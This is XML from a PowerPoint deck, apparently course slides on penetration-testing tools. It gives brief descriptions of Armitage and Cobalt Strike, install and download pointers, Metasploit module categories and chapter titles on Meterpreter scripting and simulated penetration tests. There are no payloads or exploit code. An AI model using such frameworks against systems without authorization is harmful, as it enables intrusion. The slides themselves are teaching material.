        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="303030" y="3617082"/>
            <a:ext cx="3916266" cy="3240959"/>
            <a:chOff x="507" y="1182"/>
            <a:chExt cx="3091" cy="2558"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="AutoShape 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A113E388-689F-0E6C-0BB2-8ECF035CD214}"/>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8" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEA90FFA-7141-32B2-BFEA-B07F78F70CAB}"/>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29" name="Freeform 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{340D4AC9-93AD-0565-B5F0-AC01FFE21396}"/>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30" name="Freeform 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF02E2D9-2347-C6EB-8306-6DE5FD81D49E}"/>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31" name="Freeform 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DEA45C2-5276-9CD2-204E-3192A50DF5DE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>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endParaRPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" defTabSz="1218621">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Put Your Screenshot</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" defTabSz="1218621">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Here</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" defTabSz="1218621">
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Freeform 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E66CADBA-E58D-8AED-B64A-41236E335AE7}"/>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D82FAE3B-2999-C0C2-2F11-BFAB0731458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671FFA91-EEC4-1337-1F03-44C3C5FB0FD3}"/>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1218621">
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="TextBox 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{632E0753-13E1-FDDC-3A51-CE831C7BD9E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="362750" y="1845726"/>
            <a:ext cx="3189873" cy="1446550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Armitage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-EG" sz="1100" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is a graphical cyber attack management tool for the Metasploit Project that visualizes targets and recommends exploits. It is a free and open source network security tool notable for its contributions to red team collaboration allowing for: shared sessions, data, and communication through a single Metasploit instance.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="42" name="Picture 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFDE823B-5283-028B-96A0-AC9E83223054}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8173751" y="3800132"/>
            <a:ext cx="3508700" cy="1980968"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="44" name="Picture 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAC8BEA7-B36B-BC44-0137-36A320668040}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="509549" y="3806799"/>
            <a:ext cx="3443679" cy="1967634"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{201A6CF4-86BF-1EC9-8079-F50BED0E37A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7977138" y="1906498"/>
            <a:ext cx="3418472" cy="938719"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Cobalt Strike</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>is a commercial, full-featured, remote access tool that bills itself as "adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors". </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E972198-D6EF-3C00-DA51-B94E481A90F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="569995" y="3202906"/>
            <a:ext cx="6097002" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo apt install Armitage </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{497B2A8C-1CB9-E3E8-9323-5CAD9E5C408A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6798714" y="3249017"/>
            <a:ext cx="6097002" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>https://www.cobaltstrike.com/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{579C233A-7603-58CF-C2E9-D8840EEA4E33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2662165" y="1083952"/>
            <a:ext cx="6208134" cy="430887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Download                      &amp;                         Explain</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2713776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2752232" y="-88615"/>
            <a:ext cx="6687536" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Chapter 16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>M E T E R P R E T E R S C R I P T I N G</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5087029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8537053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990980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2641625" y="-2118"/>
            <a:ext cx="6908751" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Chapter 17</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>S I M U L A T E D  P E N E T R A T I O N  T E S T</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="24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5872775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180630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887468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45C9E-41EA-7929-BEE2-53EADE93093B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="135924" y="195590"/>
            <a:ext cx="2783134" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>System Services </a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG"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42173170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E064D41-3B92-976B-8946-DC9ABC362D52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="153490" y="75300"/>
            <a:ext cx="11883000" cy="941082"/>
            <a:chOff x="3402" y="4078025"/>
            <a:chExt cx="1807958" cy="941082"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Arrow: Pentagon 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0305E8E-CCAF-526A-6143-D5B907260967}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3402" y="4078025"/>
              <a:ext cx="1807958" cy="941082"/>
            </a:xfrm>
            <a:prstGeom prst="homePlate">
              <a:avLst>
                <a:gd name="adj" fmla="val 25000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln>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Arrow: Pentagon 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2066279-0CCD-996E-0332-EEDC61A025CD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3402" y="4078025"/>
              <a:ext cx="1690323"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4400" b="1" i="1" u="sng" kern="1200" dirty="0">
                  <a:effectLst>
                    <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                      <a:schemeClr val="tx1">
                        <a:alpha val="50000"/>
                      </a:schemeClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>Exploit</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="888527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BB1F4-CDE3-C897-1B81-B005B13024A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="168496" y="121952"/>
            <a:ext cx="11855008" cy="941082"/>
            <a:chOff x="1720963" y="4078025"/>
            <a:chExt cx="1807958" cy="941082"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Arrow: Chevron 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2826EF45-5D9F-A25A-FE93-FDE01CD6D6A4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1720963" y="4078025"/>
              <a:ext cx="1807958" cy="941082"/>
            </a:xfrm>
            <a:prstGeom prst="chevron">
              <a:avLst>
                <a:gd name="adj" fmla="val 25000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solid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EB5F6832-1F18-A3B0-FF8B-5FF22A1F51EC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1956233"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4400" b="1" i="1" u="sng" kern="1200" dirty="0">
                  <a:effectLst>
                    <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                      <a:schemeClr val="tx1">
                        <a:alpha val="50000"/>
                      </a:schemeClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>Auxiliary</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8464680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E3C886-CBE6-986A-AFDA-6DED0B08776E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="88176" y="75300"/>
            <a:ext cx="11957644" cy="941082"/>
            <a:chOff x="3438524" y="4078025"/>
            <a:chExt cx="1807958" cy="941082"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Arrow: Chevron 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{110192C1-0D0C-C944-7B8A-7D6B3868DA23}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3438524" y="4078025"/>
              <a:ext cx="1807958" cy="941082"/>
            </a:xfrm>
            <a:prstGeom prst="chevron">
              <a:avLst>
                <a:gd name="adj" fmla="val 25000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="accent3"/>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37AB4AAC-5EB2-BE8F-5FDF-BCC91C23418A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3673795"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4400" b="1" i="1" u="sng" kern="1200" dirty="0">
                  <a:effectLst>
                    <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                      <a:schemeClr val="tx1">
                        <a:alpha val="50000"/>
                      </a:schemeClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>Post</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4148135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CE8C1-582D-A128-F056-B09B1069E0CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>The Difference between </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" b="1" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38D50724-931D-160B-0D2D-9083FB035DC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2881543" y="2516168"/>
            <a:ext cx="6097002" cy="3170099"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5F5F5F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    METASPLOIT FREE     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5F5F5F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Framework)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5F5F5F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5F5F5F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5F5F5F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5F5F5F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    METASPLOIT PRO</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5F5F5F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{189CA115-19E4-E7F3-09E8-296A191616CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3553827" y="1734096"/>
            <a:ext cx="6097002" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Visit : https://www.metasploit.com/download</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="398333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7">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:animClr clrSpc="hsl" dir="cw">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
